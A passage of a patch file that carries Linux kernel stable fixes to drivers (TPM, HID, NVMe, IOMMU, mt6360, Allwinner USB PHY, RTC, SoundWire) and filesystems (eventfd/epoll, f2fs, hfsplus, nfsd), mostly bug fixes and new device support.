+ 		return -EINVAL;
+@@ -141,9 +141,10 @@ static int check_acpi_tpm2(struct device *dev)
+ 
+ 	/* The tpm2_crb driver handles this device */
+ 	if (tbl->start_method != ACPI_TPM2_MEMORY_MAPPED)
+-		return -ENODEV;
++		ret = -ENODEV;
+ 
+-	return 0;
++	acpi_put_table((struct acpi_table_header *)tbl);
++	return ret;
+ }
+ #else
+ static int check_acpi_tpm2(struct device *dev)
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index 8f58c3c1bec31..e27fb27a36bfa 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -995,7 +995,10 @@
+ #define USB_DEVICE_ID_ORTEK_IHOME_IMAC_A210S	0x8003
+ 
+ #define USB_VENDOR_ID_PLANTRONICS	0x047f
++#define USB_DEVICE_ID_PLANTRONICS_BLACKWIRE_3210_SERIES	0xc055
+ #define USB_DEVICE_ID_PLANTRONICS_BLACKWIRE_3220_SERIES	0xc056
++#define USB_DEVICE_ID_PLANTRONICS_BLACKWIRE_3215_SERIES	0xc057
++#define USB_DEVICE_ID_PLANTRONICS_BLACKWIRE_3225_SERIES	0xc058
+ 
+ #define USB_VENDOR_ID_PANASONIC		0x04da
+ #define USB_DEVICE_ID_PANABOARD_UBT780	0x1044
+diff --git a/drivers/hid/hid-multitouch.c b/drivers/hid/hid-multitouch.c
+index 91a4d3fc30e08..372cbdd223e09 100644
+--- a/drivers/hid/hid-multitouch.c
++++ b/drivers/hid/hid-multitouch.c
+@@ -1967,6 +1967,10 @@ static const struct hid_device_id mt_devices[] = {
+ 		HID_DEVICE(BUS_I2C, HID_GROUP_MULTITOUCH_WIN_8,
+ 			USB_VENDOR_ID_ELAN, 0x313a) },
+ 
++	{ .driver_data = MT_CLS_WIN_8_FORCE_MULTI_INPUT,
++		HID_DEVICE(BUS_I2C, HID_GROUP_MULTITOUCH_WIN_8,
++			USB_VENDOR_ID_ELAN, 0x3148) },
++
+ 	/* Elitegroup panel */
+ 	{ .driver_data = MT_CLS_SERIAL,
+ 		MT_USB_DEVICE(USB_VENDOR_ID_ELITEGROUP,
+diff --git a/drivers/hid/hid-plantronics.c b/drivers/hid/hid-plantronics.c
+index e81b7cec2d124..3d414ae194acb 100644
+--- a/drivers/hid/hid-plantronics.c
++++ b/drivers/hid/hid-plantronics.c
+@@ -198,9 +198,18 @@ err:
+ }
+ 
+ static const struct hid_device_id plantronics_devices[] = {
++	{ HID_USB_DEVICE(USB_VENDOR_ID_PLANTRONICS,
++					 USB_DEVICE_ID_PLANTRONICS_BLACKWIRE_3210_SERIES),
++		.driver_data = PLT_QUIRK_DOUBLE_VOLUME_KEYS },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_PLANTRONICS,
+ 					 USB_DEVICE_ID_PLANTRONICS_BLACKWIRE_3220_SERIES),
+ 		.driver_data = PLT_QUIRK_DOUBLE_VOLUME_KEYS },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_PLANTRONICS,
++					 USB_DEVICE_ID_PLANTRONICS_BLACKWIRE_3215_SERIES),
++		.driver_data = PLT_QUIRK_DOUBLE_VOLUME_KEYS },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_PLANTRONICS,
++					 USB_DEVICE_ID_PLANTRONICS_BLACKWIRE_3225_SERIES),
++		.driver_data = PLT_QUIRK_DOUBLE_VOLUME_KEYS },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_PLANTRONICS, HID_ANY_ID) },
+ 	{ }
+ };
+diff --git a/drivers/iommu/mtk_iommu.c b/drivers/iommu/mtk_iommu.c
+index dad2f238ffbf2..56d007582b6fa 100644
+--- a/drivers/iommu/mtk_iommu.c
++++ b/drivers/iommu/mtk_iommu.c
+@@ -454,7 +454,7 @@ static irqreturn_t mtk_iommu_isr(int irq, void *dev_id)
+ 		fault_larb = data->plat_data->larbid_remap[fault_larb][sub_comm];
+ 	}
+ 
+-	if (report_iommu_fault(&dom->domain, bank->parent_dev, fault_iova,
++	if (!dom || report_iommu_fault(&dom->domain, bank->parent_dev, fault_iova,
+ 			       write ? IOMMU_FAULT_WRITE : IOMMU_FAULT_READ)) {
+ 		dev_err_ratelimited(
+ 			bank->parent_dev,
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index a467b492d4ad3..fd82881761d34 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -509,13 +509,14 @@ static void md_end_flush(struct bio *bio)
+ 	struct md_rdev *rdev = bio->bi_private;
+ 	struct mddev *mddev = rdev->mddev;
+ 
++	bio_put(bio);
++
+ 	rdev_dec_pending(rdev, mddev);
+ 
+ 	if (atomic_dec_and_test(&mddev->flush_pending)) {
+ 		/* The pre-request flush has finished */
+ 		queue_work(md_wq, &mddev->flush_work);
+ 	}
+-	bio_put(bio);
+ }
+ 
+ static void md_submit_flush_data(struct work_struct *ws);
+@@ -913,10 +914,12 @@ static void super_written(struct bio *bio)
+ 	} else
+ 		clear_bit(LastDev, &rdev->flags);
+ 
++	bio_put(bio);
++
++	rdev_dec_pending(rdev, mddev);
++
+ 	if (atomic_dec_and_test(&mddev->pending_writes))
+ 		wake_up(&mddev->sb_wait);
+-	rdev_dec_pending(rdev, mddev);
+-	bio_put(bio);
+ }
+ 
+ void md_super_write(struct mddev *mddev, struct md_rdev *rdev,
+diff --git a/drivers/mfd/mt6360-core.c b/drivers/mfd/mt6360-core.c
+index 6eaa6775b8885..d3b32eb798377 100644
+--- a/drivers/mfd/mt6360-core.c
++++ b/drivers/mfd/mt6360-core.c
+@@ -402,7 +402,7 @@ static int mt6360_regmap_read(void *context, const void *reg, size_t reg_size,
+ 	struct mt6360_ddata *ddata = context;
+ 	u8 bank = *(u8 *)reg;
+ 	u8 reg_addr = *(u8 *)(reg + 1);
+-	struct i2c_client *i2c = ddata->i2c[bank];
++	struct i2c_client *i2c;
+ 	bool crc_needed = false;
+ 	u8 *buf;
+ 	int buf_len = MT6360_ALLOC_READ_SIZE(val_size);
+@@ -410,6 +410,11 @@ static int mt6360_regmap_read(void *context, const void *reg, size_t reg_size,
+ 	u8 crc;
+ 	int ret;
+ 
++	if (bank >= MT6360_SLAVE_MAX)
++		return -EINVAL;
++
++	i2c = ddata->i2c[bank];
++
+ 	if (bank == MT6360_SLAVE_PMIC || bank == MT6360_SLAVE_LDO) {
+ 		crc_needed = true;
+ 		ret = mt6360_xlate_pmicldo_addr(&reg_addr, val_size);
+@@ -453,13 +458,18 @@ static int mt6360_regmap_write(void *context, const void *val, size_t val_size)
+ 	struct mt6360_ddata *ddata = context;
+ 	u8 bank = *(u8 *)val;
+ 	u8 reg_addr = *(u8 *)(val + 1);
+-	struct i2c_client *i2c = ddata->i2c[bank];
++	struct i2c_client *i2c;
+ 	bool crc_needed = false;
+ 	u8 *buf;
+ 	int buf_len = MT6360_ALLOC_WRITE_SIZE(val_size);
+ 	int write_size = val_size - MT6360_REGMAP_REG_BYTE_SIZE;
+ 	int ret;
+ 
++	if (bank >= MT6360_SLAVE_MAX)
++		return -EINVAL;
++
++	i2c = ddata->i2c[bank];
++
+ 	if (bank == MT6360_SLAVE_PMIC || bank == MT6360_SLAVE_LDO) {
+ 		crc_needed = true;
+ 		ret = mt6360_xlate_pmicldo_addr(&reg_addr, val_size - MT6360_REGMAP_REG_BYTE_SIZE);
+diff --git a/drivers/mmc/host/vub300.c b/drivers/mmc/host/vub300.c
+index ab36ec4797478..72f65f32abbc7 100644
+--- a/drivers/mmc/host/vub300.c
++++ b/drivers/mmc/host/vub300.c
+@@ -2049,6 +2049,7 @@ static void vub300_enable_sdio_irq(struct mmc_host *mmc, int enable)
+ 		return;
+ 	kref_get(&vub300->kref);
+ 	if (enable) {
++		set_current_state(TASK_RUNNING);
+ 		mutex_lock(&vub300->irq_mutex);
+ 		if (vub300->irqs_queued) {
+ 			vub300->irqs_queued -= 1;
+@@ -2064,6 +2065,7 @@ static void vub300_enable_sdio_irq(struct mmc_host *mmc, int enable)
+ 			vub300_queue_poll_work(vub300, 0);
+ 		}
+ 		mutex_unlock(&vub300->irq_mutex);
++		set_current_state(TASK_INTERRUPTIBLE);
+ 	} else {
+ 		vub300->irq_enabled = 0;
+ 	}
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index 488ad7dabeb8e..115d81def5671 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -35,7 +35,7 @@
+ #define SQ_SIZE(q)	((q)->q_depth << (q)->sqes)
+ #define CQ_SIZE(q)	((q)->q_depth * sizeof(struct nvme_completion))
+ 
+-#define SGES_PER_PAGE	(PAGE_SIZE / sizeof(struct nvme_sgl_desc))
++#define SGES_PER_PAGE	(NVME_CTRL_PAGE_SIZE / sizeof(struct nvme_sgl_desc))
+ 
+ /*
+  * These can be higher, but we need to ensure that any command doesn't
+@@ -144,9 +144,9 @@ struct nvme_dev {
+ 	mempool_t *iod_mempool;
+ 
+ 	/* shadow doorbell buffer support: */
+-	u32 *dbbuf_dbs;
++	__le32 *dbbuf_dbs;
+ 	dma_addr_t dbbuf_dbs_dma_addr;
+-	u32 *dbbuf_eis;
++	__le32 *dbbuf_eis;
+ 	dma_addr_t dbbuf_eis_dma_addr;
+ 
+ 	/* host memory buffer support: */
+@@ -210,10 +210,10 @@ struct nvme_queue {
+ #define NVMEQ_SQ_CMB		1
+ #define NVMEQ_DELETE_ERROR	2
+ #define NVMEQ_POLLED		3
+-	u32 *dbbuf_sq_db;
+-	u32 *dbbuf_cq_db;
+-	u32 *dbbuf_sq_ei;
+-	u32 *dbbuf_cq_ei;
++	__le32 *dbbuf_sq_db;
++	__le32 *dbbuf_cq_db;
++	__le32 *dbbuf_sq_ei;
++	__le32 *dbbuf_cq_ei;
+ 	struct completion delete_done;
+ };
+ 
+@@ -340,11 +340,11 @@ static inline int nvme_dbbuf_need_event(u16 event_idx, u16 new_idx, u16 old)
+ }
+ 
+ /* Update dbbuf and return true if an MMIO is required */
+-static bool nvme_dbbuf_update_and_check_event(u16 value, u32 *dbbuf_db,
+-					      volatile u32 *dbbuf_ei)
++static bool nvme_dbbuf_update_and_check_event(u16 value, __le32 *dbbuf_db,
++					      volatile __le32 *dbbuf_ei)
+ {
+ 	if (dbbuf_db) {
+-		u16 old_value;
++		u16 old_value, event_idx;
+ 
+ 		/*
+ 		 * Ensure that the queue is written before updating
+@@ -352,8 +352,8 @@ static bool nvme_dbbuf_update_and_check_event(u16 value, u32 *dbbuf_db,
+ 		 */
+ 		wmb();
+ 
+-		old_value = *dbbuf_db;
+-		*dbbuf_db = value;
++		old_value = le32_to_cpu(*dbbuf_db);
++		*dbbuf_db = cpu_to_le32(value);
+ 
+ 		/*
+ 		 * Ensure that the doorbell is updated before reading the event
+@@ -363,7 +363,8 @@ static bool nvme_dbbuf_update_and_check_event(u16 value, u32 *dbbuf_db,
+ 		 */
+ 		mb();
+ 
+-		if (!nvme_dbbuf_need_event(*dbbuf_ei, value, old_value))
++		event_idx = le32_to_cpu(*dbbuf_ei);
++		if (!nvme_dbbuf_need_event(event_idx, value, old_value))
+ 			return false;
+ 	}
+ 
+@@ -377,9 +378,9 @@ static bool nvme_dbbuf_update_and_check_event(u16 value, u32 *dbbuf_db,
+  */
+ static int nvme_pci_npages_prp(void)
+ {
+-	unsigned nprps = DIV_ROUND_UP(NVME_MAX_KB_SZ + NVME_CTRL_PAGE_SIZE,
+-				      NVME_CTRL_PAGE_SIZE);
+-	return DIV_ROUND_UP(8 * nprps, PAGE_SIZE - 8);
++	unsigned max_bytes = (NVME_MAX_KB_SZ * 1024) + NVME_CTRL_PAGE_SIZE;
++	unsigned nprps = DIV_ROUND_UP(max_bytes, NVME_CTRL_PAGE_SIZE);
++	return DIV_ROUND_UP(8 * nprps, NVME_CTRL_PAGE_SIZE - 8);
+ }
+ 
+ /*
+@@ -389,7 +390,7 @@ static int nvme_pci_npages_prp(void)
+ static int nvme_pci_npages_sgl(void)
+ {
+ 	return DIV_ROUND_UP(NVME_MAX_SEGS * sizeof(struct nvme_sgl_desc),
+-			PAGE_SIZE);
++			NVME_CTRL_PAGE_SIZE);
+ }
+ 
+ static size_t nvme_pci_iod_alloc_size(void)
+@@ -713,7 +714,7 @@ static void nvme_pci_sgl_set_seg(struct nvme_sgl_desc *sge,
+ 		sge->length = cpu_to_le32(entries * sizeof(*sge));
+ 		sge->type = NVME_SGL_FMT_LAST_SEG_DESC << 4;
+ 	} else {
+-		sge->length = cpu_to_le32(PAGE_SIZE);
++		sge->length = cpu_to_le32(NVME_CTRL_PAGE_SIZE);
+ 		sge->type = NVME_SGL_FMT_SEG_DESC << 4;
+ 	}
+ }
+diff --git a/drivers/nvme/target/passthru.c b/drivers/nvme/target/passthru.c
+index 79af5140af8bf..adc0958755d66 100644
+--- a/drivers/nvme/target/passthru.c
++++ b/drivers/nvme/target/passthru.c
+@@ -334,14 +334,13 @@ static void nvmet_passthru_execute_cmd(struct nvmet_req *req)
+ 	}
+ 
+ 	/*
+-	 * If there are effects for the command we are about to execute, or
+-	 * an end_req function we need to use nvme_execute_passthru_rq()
+-	 * synchronously in a work item seeing the end_req function and
+-	 * nvme_passthru_end() can't be called in the request done callback
+-	 * which is typically in interrupt context.
++	 * If a command needs post-execution fixups, or there are any
++	 * non-trivial effects, make sure to execute the command synchronously
++	 * in a workqueue so that nvme_passthru_end gets called.
+ 	 */
+ 	effects = nvme_command_effects(ctrl, ns, req->cmd->common.opcode);
+-	if (req->p.use_workqueue || effects) {
++	if (req->p.use_workqueue ||
++	    (effects & ~(NVME_CMD_EFFECTS_CSUPP | NVME_CMD_EFFECTS_LBCC))) {
+ 		INIT_WORK(&req->p.work, nvmet_passthru_execute_cmd_work);
+ 		req->p.rq = rq;
+ 		queue_work(nvmet_wq, &req->p.work);
+diff --git a/drivers/phy/allwinner/phy-sun4i-usb.c b/drivers/phy/allwinner/phy-sun4i-usb.c
+index 3a3831f6059a3..5472db9e87ef8 100644
+--- a/drivers/phy/allwinner/phy-sun4i-usb.c
++++ b/drivers/phy/allwinner/phy-sun4i-usb.c
+@@ -120,6 +120,7 @@ struct sun4i_usb_phy_cfg {
+ 	u8 phyctl_offset;
+ 	bool dedicated_clocks;
+ 	bool phy0_dual_route;
++	bool needs_phy2_siddq;
+ 	int missing_phys;
+ };
+ 
+@@ -289,6 +290,50 @@ static int sun4i_usb_phy_init(struct phy *_phy)
+ 		return ret;
+ 	}
+ 
++	/* Some PHYs on some SoCs need the help of PHY2 to work. */
++	if (data->cfg->needs_phy2_siddq && phy->index != 2) {
++		struct sun4i_usb_phy *phy2 = &data->phys[2];
++
++		ret = clk_prepare_enable(phy2->clk);
++		if (ret) {
++			reset_control_assert(phy->reset);
++			clk_disable_unprepare(phy->clk2);
++			clk_disable_unprepare(phy->clk);
++			return ret;
++		}
++
++		ret = reset_control_deassert(phy2->reset);
++		if (ret) {
++			clk_disable_unprepare(phy2->clk);
++			reset_control_assert(phy->reset);
++			clk_disable_unprepare(phy->clk2);
++			clk_disable_unprepare(phy->clk);
++			return ret;
++		}
++
++		/*
++		 * This extra clock is just needed to access the
++		 * REG_HCI_PHY_CTL PMU register for PHY2.
++		 */
++		ret = clk_prepare_enable(phy2->clk2);
++		if (ret) {
++			reset_control_assert(phy2->reset);
++			clk_disable_unprepare(phy2->clk);
++			reset_control_assert(phy->reset);
++			clk_disable_unprepare(phy->clk2);
++			clk_disable_unprepare(phy->clk);
++			return ret;
++		}
++
++		if (phy2->pmu && data->cfg->hci_phy_ctl_clear) {
++			val = readl(phy2->pmu + REG_HCI_PHY_CTL);
++			val &= ~data->cfg->hci_phy_ctl_clear;
++			writel(val, phy2->pmu + REG_HCI_PHY_CTL);
++		}
++
++		clk_disable_unprepare(phy->clk2);
++	}
++
+ 	if (phy->pmu && data->cfg->hci_phy_ctl_clear) {
+ 		val = readl(phy->pmu + REG_HCI_PHY_CTL);
+ 		val &= ~data->cfg->hci_phy_ctl_clear;
+@@ -354,6 +399,13 @@ static int sun4i_usb_phy_exit(struct phy *_phy)
+ 		data->phy0_init = false;
+ 	}
+ 
++	if (data->cfg->needs_phy2_siddq && phy->index != 2) {
++		struct sun4i_usb_phy *phy2 = &data->phys[2];
++
++		clk_disable_unprepare(phy2->clk);
++		reset_control_assert(phy2->reset);
++	}
++
+ 	sun4i_usb_phy_passby(phy, 0);
+ 	reset_control_assert(phy->reset);
+ 	clk_disable_unprepare(phy->clk2);
+@@ -785,6 +837,13 @@ static int sun4i_usb_phy_probe(struct platform_device *pdev)
+ 				dev_err(dev, "failed to get clock %s\n", name);
+ 				return PTR_ERR(phy->clk2);
+ 			}
++		} else {
++			snprintf(name, sizeof(name), "pmu%d_clk", i);
++			phy->clk2 = devm_clk_get_optional(dev, name);
++			if (IS_ERR(phy->clk2)) {
++				dev_err(dev, "failed to get clock %s\n", name);
++				return PTR_ERR(phy->clk2);
++			}
+ 		}
+ 
+ 		snprintf(name, sizeof(name), "usb%d_reset", i);
+@@ -973,6 +1032,17 @@ static const struct sun4i_usb_phy_cfg sun50i_h6_cfg = {
+ 	.missing_phys = BIT(1) | BIT(2),
+ };
+ 
++static const struct sun4i_usb_phy_cfg sun50i_h616_cfg = {
++	.num_phys = 4,
++	.type = sun50i_h6_phy,
++	.disc_thresh = 3,
++	.phyctl_offset = REG_PHYCTL_A33,
++	.dedicated_clocks = true,
++	.phy0_dual_route = true,
++	.hci_phy_ctl_clear = PHY_CTL_SIDDQ,
++	.needs_phy2_siddq = true,
++};
++
+ static const struct of_device_id sun4i_usb_phy_of_match[] = {
+ 	{ .compatible = "allwinner,sun4i-a10-usb-phy", .data = &sun4i_a10_cfg },
+ 	{ .compatible = "allwinner,sun5i-a13-usb-phy", .data = &sun5i_a13_cfg },
+@@ -988,6 +1058,7 @@ static const struct of_device_id sun4i_usb_phy_of_match[] = {
+ 	{ .compatible = "allwinner,sun50i-a64-usb-phy",
+ 	  .data = &sun50i_a64_cfg},
+ 	{ .compatible = "allwinner,sun50i-h6-usb-phy", .data = &sun50i_h6_cfg },
++	{ .compatible = "allwinner,sun50i-h616-usb-phy", .data = &sun50i_h616_cfg },
+ 	{ },
+ };
+ MODULE_DEVICE_TABLE(of, sun4i_usb_phy_of_match);
+diff --git a/drivers/rtc/rtc-msc313.c b/drivers/rtc/rtc-msc313.c
+index f3fde013c4b8b..8d7737e0e2e02 100644
+--- a/drivers/rtc/rtc-msc313.c
++++ b/drivers/rtc/rtc-msc313.c
+@@ -212,22 +212,12 @@ static int msc313_rtc_probe(struct platform_device *pdev)
+ 		return ret;
+ 	}
+ 
+-	clk = devm_clk_get(dev, NULL);
++	clk = devm_clk_get_enabled(dev, NULL);
+ 	if (IS_ERR(clk)) {
+ 		dev_err(dev, "No input reference clock\n");
+ 		return PTR_ERR(clk);
+ 	}
+ 
+-	ret = clk_prepare_enable(clk);
+-	if (ret) {
+-		dev_err(dev, "Failed to enable the reference clock, %d\n", ret);
+-		return ret;
+-	}
+-
+-	ret = devm_add_action_or_reset(dev, (void (*) (void *))clk_disable_unprepare, clk);
+-	if (ret)
+-		return ret;
+-
+ 	rate = clk_get_rate(clk);
+ 	writew(rate & 0xFFFF, priv->rtc_base + REG_RTC_FREQ_CW_L);
+ 	writew((rate >> 16) & 0xFFFF, priv->rtc_base + REG_RTC_FREQ_CW_H);
+diff --git a/drivers/soundwire/dmi-quirks.c b/drivers/soundwire/dmi-quirks.c
+index f81cdd83ec26e..7969881f126dc 100644
+--- a/drivers/soundwire/dmi-quirks.c
++++ b/drivers/soundwire/dmi-quirks.c
+@@ -90,6 +90,14 @@ static const struct dmi_system_id adr_remap_quirk_table[] = {
+ 		},
+ 		.driver_data = (void *)intel_tgl_bios,
+ 	},
++	{
++		/* quirk used for NUC15 LAPBC710 skew */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "Intel Corporation"),
++			DMI_MATCH(DMI_BOARD_NAME, "LAPBC710"),
++		},
++		.driver_data = (void *)intel_tgl_bios,
++	},
+ 	{
+ 		.matches = {
+ 			DMI_MATCH(DMI_SYS_VENDOR, "Dell Inc"),
+diff --git a/fs/binfmt_elf_fdpic.c b/fs/binfmt_elf_fdpic.c
+index 08d0c8797828c..9ce5e1f41c26f 100644
+--- a/fs/binfmt_elf_fdpic.c
++++ b/fs/binfmt_elf_fdpic.c
+@@ -434,8 +434,9 @@ static int load_elf_fdpic_binary(struct linux_binprm *bprm)
+ 	current->mm->start_stack = current->mm->start_brk + stack_size;
+ #endif
+ 
+-	if (create_elf_fdpic_tables(bprm, current->mm,
+-				    &exec_params, &interp_params) < 0)
++	retval = create_elf_fdpic_tables(bprm, current->mm, &exec_params,
++					 &interp_params);
++	if (retval < 0)
+ 		goto error;
+ 
+ 	kdebug("- start_code  %lx", current->mm->start_code);
+diff --git a/fs/eventfd.c b/fs/eventfd.c
+index c0ffee99ad238..249ca6c0b7843 100644
+--- a/fs/eventfd.c
++++ b/fs/eventfd.c
+@@ -43,21 +43,7 @@ struct eventfd_ctx {
+ 	int id;
+ };
+ 
+-/**
+- * eventfd_signal - Adds @n to the eventfd counter.
+- * @ctx: [in] Pointer to the eventfd context.
+- * @n: [in] Value of the counter to be added to the eventfd internal counter.
+- *          The value cannot be negative.
+- *
+- * This function is supposed to be called by the kernel in paths that do not
+- * allow sleeping. In this function we allow the counter to reach the ULLONG_MAX
+- * value, and we signal this as overflow condition by returning a EPOLLERR
+- * to poll(2).
+- *
+- * Returns the amount by which the counter was incremented.  This will be less
+- * than @n if the counter has overflowed.
+- */
+-__u64 eventfd_signal(struct eventfd_ctx *ctx, __u64 n)
++__u64 eventfd_signal_mask(struct eventfd_ctx *ctx, __u64 n, unsigned mask)
+ {
+ 	unsigned long flags;
+ 
+@@ -78,12 +64,31 @@ __u64 eventfd_signal(struct eventfd_ctx *ctx, __u64 n)
+ 		n = ULLONG_MAX - ctx->count;
+ 	ctx->count += n;
+ 	if (waitqueue_active(&ctx->wqh))
+-		wake_up_locked_poll(&ctx->wqh, EPOLLIN);
++		wake_up_locked_poll(&ctx->wqh, EPOLLIN | mask);
+ 	current->in_eventfd = 0;
+ 	spin_unlock_irqrestore(&ctx->wqh.lock, flags);
+ 
+ 	return n;
+ }
++
++/**
++ * eventfd_signal - Adds @n to the eventfd counter.
++ * @ctx: [in] Pointer to the eventfd context.
++ * @n: [in] Value of the counter to be added to the eventfd internal counter.
++ *          The value cannot be negative.
++ *
++ * This function is supposed to be called by the kernel in paths that do not
++ * allow sleeping. In this function we allow the counter to reach the ULLONG_MAX
++ * value, and we signal this as overflow condition by returning a EPOLLERR
++ * to poll(2).
++ *
++ * Returns the amount by which the counter was incremented.  This will be less
++ * than @n if the counter has overflowed.
++ */
++__u64 eventfd_signal(struct eventfd_ctx *ctx, __u64 n)
++{
++	return eventfd_signal_mask(ctx, n, 0);
++}
+ EXPORT_SYMBOL_GPL(eventfd_signal);
+ 
+ static void eventfd_free_ctx(struct eventfd_ctx *ctx)
+diff --git a/fs/eventpoll.c b/fs/eventpoll.c
+index 52954d4637b54..64659b1109733 100644
+--- a/fs/eventpoll.c
++++ b/fs/eventpoll.c
+@@ -491,7 +491,8 @@ static inline void ep_set_busy_poll_napi_id(struct epitem *epi)
+  */
+ #ifdef CONFIG_DEBUG_LOCK_ALLOC
+ 
+-static void ep_poll_safewake(struct eventpoll *ep, struct epitem *epi)
++static void ep_poll_safewake(struct eventpoll *ep, struct epitem *epi,
++			     unsigned pollflags)
+ {
+ 	struct eventpoll *ep_src;
+ 	unsigned long flags;
+@@ -522,16 +523,17 @@ static void ep_poll_safewake(struct eventpoll *ep, struct epitem *epi)
+ 	}
+ 	spin_lock_irqsave_nested(&ep->poll_wait.lock, flags, nests);
+ 	ep->nests = nests + 1;
+-	wake_up_locked_poll(&ep->poll_wait, EPOLLIN);
++	wake_up_locked_poll(&ep->poll_wait, EPOLLIN | pollflags);
+ 	ep->nests = 0;
+ 	spin_unlock_irqrestore(&ep->poll_wait.lock, flags);
+ }
+ 
+ #else
+ 
+-static void ep_poll_safewake(struct eventpoll *ep, struct epitem *epi)
++static void ep_poll_safewake(struct eventpoll *ep, struct epitem *epi,
++			     unsigned pollflags)
+ {
+-	wake_up_poll(&ep->poll_wait, EPOLLIN);
++	wake_up_poll(&ep->poll_wait, EPOLLIN | pollflags);
+ }
+ 
+ #endif
+@@ -742,7 +744,7 @@ static void ep_free(struct eventpoll *ep)
+ 
+ 	/* We need to release all tasks waiting for these file */
+ 	if (waitqueue_active(&ep->poll_wait))
+-		ep_poll_safewake(ep, NULL);
++		ep_poll_safewake(ep, NULL, 0);
+ 
+ 	/*
+ 	 * We need to lock this because we could be hit by
+@@ -1208,7 +1210,7 @@ out_unlock:
+ 
+ 	/* We have to call this outside the lock */
+ 	if (pwake)
+-		ep_poll_safewake(ep, epi);
++		ep_poll_safewake(ep, epi, pollflags & EPOLL_URING_WAKE);
+ 
+ 	if (!(epi->event.events & EPOLLEXCLUSIVE))
+ 		ewake = 1;
+@@ -1553,7 +1555,7 @@ static int ep_insert(struct eventpoll *ep, const struct epoll_event *event,
+ 
+ 	/* We have to call this outside the lock */
+ 	if (pwake)
+-		ep_poll_safewake(ep, NULL);
++		ep_poll_safewake(ep, NULL, 0);
+ 
+ 	return 0;
+ }
+@@ -1629,7 +1631,7 @@ static int ep_modify(struct eventpoll *ep, struct epitem *epi,
+ 
+ 	/* We have to call this outside the lock */
+ 	if (pwake)
+-		ep_poll_safewake(ep, NULL);
++		ep_poll_safewake(ep, NULL, 0);
+ 
+ 	return 0;
+ }
+diff --git a/fs/f2fs/gc.c b/fs/f2fs/gc.c
+index 22c1f876e8c52..b3184d8b1ce89 100644
+--- a/fs/f2fs/gc.c
++++ b/fs/f2fs/gc.c
+@@ -1109,6 +1109,7 @@ static bool is_alive(struct f2fs_sb_info *sbi, struct f2fs_summary *sum,
+ 	if (ofs_in_node >= max_addrs) {
+ 		f2fs_err(sbi, "Inconsistent ofs_in_node:%u in summary, ino:%u, nid:%u, max:%u",
+ 			ofs_in_node, dni->ino, dni->nid, max_addrs);
++		f2fs_put_page(node_page, 1);
+ 		return false;
+ 	}
+ 
+diff --git a/fs/f2fs/node.c b/fs/f2fs/node.c
+index 983572f238969..b9ee5a1176a07 100644
+--- a/fs/f2fs/node.c
++++ b/fs/f2fs/node.c
+@@ -1360,8 +1360,7 @@ static int read_node_page(struct page *page, blk_opf_t op_flags)
+ 		return err;
+ 
+ 	/* NEW_ADDR can be seen, after cp_error drops some dirty node pages */
+-	if (unlikely(ni.blk_addr == NULL_ADDR || ni.blk_addr == NEW_ADDR) ||
+-			is_sbi_flag_set(sbi, SBI_IS_SHUTDOWN)) {
++	if (unlikely(ni.blk_addr == NULL_ADDR || ni.blk_addr == NEW_ADDR)) {
+ 		ClearPageUptodate(page);
+ 		return -ENOENT;
+ 	}
+diff --git a/fs/hfsplus/hfsplus_fs.h b/fs/hfsplus/hfsplus_fs.h
+index a5db2e3b29801..6aa919e594834 100644
+--- a/fs/hfsplus/hfsplus_fs.h
++++ b/fs/hfsplus/hfsplus_fs.h
+@@ -198,6 +198,8 @@ struct hfsplus_sb_info {
+ #define HFSPLUS_SB_HFSX		3
+ #define HFSPLUS_SB_CASEFOLD	4
+ #define HFSPLUS_SB_NOBARRIER	5
++#define HFSPLUS_SB_UID		6
++#define HFSPLUS_SB_GID		7
+ 
+ static inline struct hfsplus_sb_info *HFSPLUS_SB(struct super_block *sb)
+ {
+diff --git a/fs/hfsplus/inode.c b/fs/hfsplus/inode.c
+index aeab83ed1c9c6..b675581aa9d0f 100644
+--- a/fs/hfsplus/inode.c
++++ b/fs/hfsplus/inode.c
+@@ -192,11 +192,11 @@ static void hfsplus_get_perms(struct inode *inode,
+ 	mode = be16_to_cpu(perms->mode);
+ 
+ 	i_uid_write(inode, be32_to_cpu(perms->owner));
+-	if (!i_uid_read(inode) && !mode)
++	if ((test_bit(HFSPLUS_SB_UID, &sbi->flags)) || (!i_uid_read(inode) && !mode))
+ 		inode->i_uid = sbi->uid;
+ 
+ 	i_gid_write(inode, be32_to_cpu(perms->group));
+-	if (!i_gid_read(inode) && !mode)
++	if ((test_bit(HFSPLUS_SB_GID, &sbi->flags)) || (!i_gid_read(inode) && !mode))
+ 		inode->i_gid = sbi->gid;
+ 
+ 	if (dir) {
+diff --git a/fs/hfsplus/options.c b/fs/hfsplus/options.c
+index 047e05c575601..c94a58762ad6d 100644
+--- a/fs/hfsplus/options.c
++++ b/fs/hfsplus/options.c
+@@ -140,6 +140,8 @@ int hfsplus_parse_options(char *input, struct hfsplus_sb_info *sbi)
+ 			if (!uid_valid(sbi->uid)) {
+ 				pr_err("invalid uid specified\n");
+ 				return 0;
++			} else {
++				set_bit(HFSPLUS_SB_UID, &sbi->flags);
+ 			}
+ 			break;
+ 		case opt_gid:
+@@ -151,6 +153,8 @@ int hfsplus_parse_options(char *input, struct hfsplus_sb_info *sbi)
+ 			if (!gid_valid(sbi->gid)) {
+ 				pr_err("invalid gid specified\n");
+ 				return 0;
++			} else {
++				set_bit(HFSPLUS_SB_GID, &sbi->flags);
+ 			}
+ 			break;
+ 		case opt_part:
+diff --git a/fs/nfsd/nfs4proc.c b/fs/nfsd/nfs4proc.c
+index 32fe7cbfb28b3..34d1cd5883fbb 100644
+--- a/fs/nfsd/nfs4proc.c
++++ b/fs/nfsd/nfs4proc.c
+@@ -1465,13 +1465,6 @@ out_err:
+ 	return status;
+ }
+ 
+-static void
+-nfsd4_interssc_disconnect(struct vfsmount *ss_mnt)
+-{
+-	nfs_do_sb_deactive(ss_mnt->mnt_sb);
+-	mntput(ss_mnt);
+-}
+-
+ /*
+  * Verify COPY destination stateid.
